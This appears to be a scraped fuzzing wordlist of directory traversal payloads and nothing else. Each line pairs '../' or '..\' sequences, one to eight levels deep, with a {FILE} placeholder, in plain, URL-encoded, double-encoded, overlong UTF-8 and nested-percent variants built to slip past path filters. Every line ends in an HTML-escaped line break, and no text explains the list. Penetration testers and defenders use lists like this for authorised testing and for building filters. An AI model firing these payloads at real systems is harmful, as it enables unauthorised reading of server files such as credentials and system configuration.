%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
